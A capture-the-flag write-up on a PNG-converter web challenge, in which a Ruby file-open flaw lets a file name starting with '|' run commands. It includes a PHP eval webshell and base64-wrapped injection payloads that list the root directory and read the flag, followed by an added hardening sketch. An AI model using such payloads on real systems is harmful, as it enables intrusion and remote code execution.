Fifth Space Intelligent Security Competition past challenge: PNG image converter
2022-07-29 05:52:00 【EdmunDJK】
Solution steps:
Without further ado, download the challenge attachment and open it in Notepad. It turns out to be the source code of the web page, so, as usual, we audit it.
The code audit shows that the file name is filtered for the ../ sequence, so we cannot upload directly.
In convert, we find a file.open flaw that can be exploited.
First, let's understand what this statement does: upload a file in PNG format, and it returns the Base64-encoded file name.
"var img = document.createElement(\"img\");\nimg.src= \"data:image/png;base64," + Base64.encode64(res).gsub(/\s*/, '') + "\";\n"
Let's upload an arbitrary .png file whose content is a one-line webshell and see whether it succeeds.
GIF89a
<?php phpinfo(); @eval($_POST['123']); ?>
Click upload; the page shows that the upload succeeded.

We can see that the file name has been changed. Next, let's convert the contents of the file: click convert,
enter the modified file name from above, and click submit.
It is easy to see that the contents of our file have been Base64-encoded.
So we cannot simply upload a one-line webshell. But since the application does read the file, even though the result is Base64-encoded, we can put our shell command in directly and just decode the output.
However, the code audit above showed that ../ is filtered, so here we use backquotes (``) and the pipe symbol (|) to do what we want. First, an introduction to what backquotes and the pipe symbol do.
Backquotes:
Backquotes are shell special characters. To get the result of the command in backquotes, the shell actually executes the command specified inside them. During execution, special characters in the command such as $, ", and ? keep their special meanings, and the backquotes may contain any legal shell command.
$ ls
note readme.txt Notice Unix.dir
$ TestString="`echo $HOME ` ` ls [nN]*`"
$ echo $TestString
/home/yxz note Notice
Reference link: https://blog.csdn.net/weixin_40240670/article/details/86694724
Pipe:
The output of one command can be used as the input of another through a pipe.
"|" is the pipeline operator, or pipe symbol for short. When two commands are separated by the pipe symbol "|" that Linux provides, the output of the command on the left of the pipe is used as the input of the command on the right. Chaining pipes means that the output of the first command becomes the input of the second command, the output of the second command becomes the input of the third command, and so on.
Use Burp (bp) to capture the request: enter the file name that was just uploaded and click submit.
Below we can see the request for the image conversion; send it to Repeater.
So let's start here. The source file is Base64-encoded, so we use backquotes to execute a shell command inside them, and then use the pipe symbol to decode the converted file.
Here we use ls / to view the files in the root directory: Base64-encode the command, add the Base64 decoding instruction, and redirect the shell command's output into the uploaded image file.

It reports an error. On re-examination, one pipe symbol was missing... Send again:
file=|`echo bHMgLw== | base64 -d`>4755211f043684058811cb50d9ddb4df.png

The Render view seems to show nothing, so open the page to look.

We see a string of Base64-encoded content. Decode it! Use HackBar:
choose base64 decode and decode the content above to see the root directory, which contains a flag_9707 file.
Now that we know where the flag is, we go straight to the cat command. Same method as before: Base64-encode cat /flag_9707, add the Base64 decoding instruction, and redirect the shell command's output (the flag content) into the uploaded image file.

file=|`echo Y2F0IC9mbGFnXzk3MDc= | base64 -d`>4755211f043684058811cb50d9ddb4df.png
Click send; no error is reported. Open the page to view the result.
Decode the following content to get the flag:

ctfhub{4d99ffb30443051a909a2e0d}
There are many shortcomings in this article; please go easy on me....
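
The payload above gets through because a ../ denylist says nothing about a leading | and because the name then reaches a call that treats that character as "run a command". The Ruby sketch below is an added example, not code from the challenge or from this write-up: it contrasts that kind of denylist with an allowlist for the stored-name format shown above, read through File.open. It assumes the handler uses Ruby's Kernel#open; denylist_accepts? and safe_convert are hypothetical names, and the denylist is a reconstruction from the write-up's description.

```ruby
require 'tmpdir'

# Payload string quoted from the write-up; it is only compared, never opened.
PAYLOAD = '|`echo bHMgLw== | base64 -d`>4755211f043684058811cb50d9ddb4df.png'

# Name format the upload step on this page returns: 32 hex characters + ".png".
STORED_NAME = /\A[0-9a-f]{32}\.png\z/

# Assumed reconstruction of the weak check: a denylist that only blocks "../".
def denylist_accepts?(name)
  !name.include?('../')
end

# Hardened lookup (hypothetical helper). Returns a data URI, or nil if rejected.
def safe_convert(upload_dir, name)
  return nil unless name.is_a?(String) && STORED_NAME.match?(name)
  root = File.expand_path(upload_dir)
  path = File.expand_path(name, root)
  return nil unless File.dirname(path) == root && File.file?(path)
  # File.open always treats its argument as a path; Kernel#open treats a
  # leading "|" as a command to run, which is what the payload relies on.
  data = File.open(path, 'rb') { |f| f.read }
  'data:image/png;base64,' + [data].pack('m0') # m0 = Base64 without newlines
end

if __FILE__ == $PROGRAM_NAME
  Dir.mktmpdir do |dir|
    # Constructed sample upload: a file that holds only the GIF89a marker.
    File.binwrite(File.join(dir, '4755211f043684058811cb50d9ddb4df.png'), 'GIF89a')
    puts "denylist accepts payload:  #{denylist_accepts?(PAYLOAD)}"
    puts "allowlist accepts payload: #{!safe_convert(dir, PAYLOAD).nil?}"
    puts safe_convert(dir, '4755211f043684058811cb50d9ddb4df.png')
  end
end
```

The same allowlist is also a usable detection rule: any convert request whose file parameter does not match STORED_NAME is worth logging.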